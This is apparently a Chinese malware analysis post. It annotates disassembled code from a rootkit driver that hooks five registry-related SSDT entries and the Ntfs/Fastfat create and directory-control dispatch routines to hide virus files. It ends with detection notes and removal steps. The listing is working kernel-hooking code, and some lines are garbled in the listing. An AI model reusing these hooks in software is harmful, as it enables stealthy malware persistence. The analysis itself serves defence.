修改系统服务分发表(SSDT)中原生 API 函数的地址，拦截与注册表相关的五条系统服务；挂钩 fastfat.sys/ntfs.sys，从而使病毒文件无法被找到
;-----------------------------------------------------------------------
; sub_1286E — installs five SSDT (System Service Descriptor Table) hooks
;             for registry-related native services.
; Reconstructed C shape (32-bit, stdcall-style compiler prolog, no args):
;   void sub_1286E(void)
; In:    nothing (reads kernel exports KeServiceDescriptorTable, Zw*)
; Out:   nothing; side effect = five SSDT slots now point at code inside
;        this driver (loc_12192, loc_1224A, loc_12412, loc_125DA, loc_12730)
; Clobb: eax, ecx, flags; CR0 is modified and restored; IF is cleared/set
; Detection notes for defenders:
;   - SSDT entries whose target lies outside the ntoskrnl image.
;   - CR0.WP being cleared from a third-party driver (bit 16 mask below).
;   - cli/sti only affects the current CPU; the hook write is not
;     synchronized against other processors (observation, not a fix).
;-----------------------------------------------------------------------
sub_1286E proc near
var_4= dword ptr -4                     ; saved original CR0 value
mov edi, edi                            ; 2-byte no-op (compiler hot-patch pad)
push ebp
mov ebp, esp
push ecx                                ; reserve the one dword local (var_4)
cli                                     ; mask interrupts on this CPU while WP is off
mov eax, cr0
mov [ebp+var_4], eax                    ; remember CR0 so it can be restored exactly
and eax, 0FFFEFFFFh                     ; clear bit 16 = CR0.WP, making read-only pages writable
mov cr0, eax
; --- hook 1: ZwOpenKey -> loc_12192 ---
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]                          ; ecx = ServiceTableBase (first field of the descriptor)
mov eax, ds:ZwOpenKey                   ; eax = address of the ZwOpenKey stub
mov eax, [eax+1]                        ; stub starts with mov eax,<index>; byte +1 holds the service index
mov dword ptr [ecx+eax*4], offset loc_12192 ; overwrite the SSDT slot with the in-driver handler
; --- hook 2: ZwEnumerateKey -> loc_1224A (same pattern as above) ---
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwEnumerateKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_1224A
; --- hook 3: ZwEnumerateValueKey -> loc_12412 ---
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwEnumerateValueKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_12412
; --- hook 4: ZwSetValueKey -> loc_125DA ---
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwSetValueKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_125DA
; --- hook 5: ZwDeleteValueKey -> loc_12730 (index read before the table deref here) ---
mov ecx, ds:KeServiceDescriptorTable
mov eax, ds:ZwDeleteValueKey
mov eax, [eax+1]
mov ecx, [ecx]
mov dword ptr [ecx+eax*4], offset loc_12730
; --- restore write protection and interrupts ---
mov eax, [ebp+var_4]
mov cr0, eax                            ; restore the saved CR0 (WP back on)
sti
leave
retn
;-----------------------------------------------------------------------
; sub_11CB8 — hooks two IRP dispatch entries of a file-system driver
;             object (Ntfs or Fastfat) so directory/create requests pass
;             through this driver first.
; Reconstructed C shape (stdcall, one dword arg, see "retn 4"):
;   NTSTATUS __stdcall sub_11CB8(int which)   // 0 = "\FileSystem\Ntfs",
;                                             // 1 = "\FileSystem\Fastfat"
; In:    [ebp+arg_0] = which (also reused later as scratch for saved CR0)
; Out:   eax = 0 (STATUS_SUCCESS) on success, otherwise the negative
;        NTSTATUS returned by ObReferenceObjectByName
; Side effects (per index 'which'):
;   dword_12E44[which] = referenced PDRIVER_OBJECT
;   dword_12E1C[which] = original MajorFunction at +0x38 (IRP_MJ_CREATE on x86)
;   dword_12E30[which] = original MajorFunction at +0x68 (IRP_MJ_DIRECTORY_CONTROL)
; Clobb: eax, ecx, edx (by callees), flags; CR0 and IF toggled and restored
; Detection notes for defenders:
;   - DRIVER_OBJECT.MajorFunction pointers for ntfs/fastfat that resolve
;     outside the file-system driver's own image.
;   - Another CR0.WP clear from a third-party driver.
; Observation: when 'which' is neither 0 nor 1 the code jumps to
; loc_11CE6 without initializing DestinationString, so the name lookup
; runs on an uninitialized UNICODE_STRING (listing-level observation).
;-----------------------------------------------------------------------
sub_11CB8 proc near
DestinationString= UNICODE_STRING ptr -8 ; local UNICODE_STRING for the driver object name
arg_0= dword ptr 8                      ; which (0 = Ntfs, 1 = Fastfat); later overwritten with saved CR0
mov edi, edi                            ; 2-byte no-op (compiler hot-patch pad)
push ebp
mov ebp, esp
push ecx                                ; reserve 8 bytes for DestinationString
push ecx
push ebx                                ; callee-saved registers used below
push esi
mov esi, [ebp+arg_0]                    ; esi = which
mov eax, esi
xor ebx, ebx                            ; ebx = 0, reused as NULL/zero argument throughout
sub eax, ebx                            ; eax = which - 0 (sets ZF when which == 0)
push edi
jz short loc_11CD7                      ; which == 0 -> Ntfs
dec eax
jnz short loc_11CE6                     ; which not in {0,1}: skip string init (see header note)
offset s_FilesystemFas ; "\\FileSystem\\Fastfat" ; NOTE(review): mnemonic dropped in the listing; presumably "push offset ..." like the Ntfs branch
jmp short loc_11CDC
??觲L /                                 ; garbled bytes in the listing (likely data/padding, not an instruction)
loc_11CD7: ; "\\FileSystem\\Ntfs"
push offset s_FilesystemNtf
loc_11CDC:
lea eax, [ebp+DestinationString]
push eax ; DestinationString
call ds:RtlInitUnicodeString            ; DestinationString = L"\FileSystem\<Ntfs|Fastfat>"
loc_11CE6:
mov eax, ds:IoDriverObjectType          ; eax = &IoDriverObjectType (POBJECT_TYPE*)
mov edi, esi
shl edi, 2                              ; edi = which * 4, dword index into the three tables below
lea esi, dword_12E44[edi]               ; esi = &dword_12E44[which] (receives the PDRIVER_OBJECT)
; ObReferenceObjectByName args pushed right-to-left:
push esi                                ; Object       = &dword_12E44[which]
push ebx                                ; ParseContext = NULL
push ebx                                ; AccessMode   = 0 (KernelMode)
mov [esi], ebx                          ; pre-clear the output slot
push dword ptr [eax]                    ; ObjectType   = *IoDriverObjectType
lea eax, [ebp+DestinationString]
push ebx                                ; DesiredAccess = 0
push ebx                                ; AccessState   = NULL
push 40h                                ; Attributes    = 0x40 (OBJ_CASE_INSENSITIVE)
push eax                                ; ObjectName    = &DestinationString
call ds:ObReferenceObjectByName
cmp eax, ebx
jl short loc_11D4F                      ; negative NTSTATUS -> return it unchanged
cli                                     ; this CPU only; no cross-CPU synchronization
mov eax, cr0
mov [ebp+arg_0], eax                    ; arg slot reused to hold the original CR0
and eax, 0FFFEFFFFh                     ; clear CR0.WP (bit 16)
mov cr0, eax
mov ecx, [esi]                          ; ecx = PDRIVER_OBJECT
mov eax, offset loc_11A06               ; new handler for MajorFunction at +0x38
add ecx, 38h                            ; &MajorFunction[0] on 32-bit DRIVER_OBJECT (IRP_MJ_CREATE)
xchg eax, [ecx]                         ; swap in hook, eax = original pointer
mov ecx, [esi]
mov dword_12E1C[edi], eax               ; save original IRP_MJ_CREATE handler
mov eax, offset word_11AF2              ; new handler for MajorFunction at +0x68
add ecx, 68h                            ; (0x68-0x38)/4 = 12 = IRP_MJ_DIRECTORY_CONTROL
xchg eax, [ecx]
mov dword_12E30[edi], eax               ; save original IRP_MJ_DIRECTORY_CONTROL handler
mov eax, [ebp+arg_0]
mov cr0, eax                            ; restore CR0 (WP back on)
sti
xor eax, eax                            ; return STATUS_SUCCESS
loc_11D4F:
pop edi
pop esi
pop ebx
leave
retn 4                                  ; stdcall: callee pops the single dword argument
sub_11CB8 endp
连驱动都没有放出来就被微点拦截了,苦命的娃
Rootkit 解除方法：仅用于解除该病毒的 Rootkit——右键选择“修复函数入口地址”，不要用“全部修复”，否则在安装了主防类型杀软的情况下会造成系统崩溃
把 Runtime2.sys 中的函数地址全部修复，该后门的 Rootkit 就解决了，其余部分就没有什么技术含量了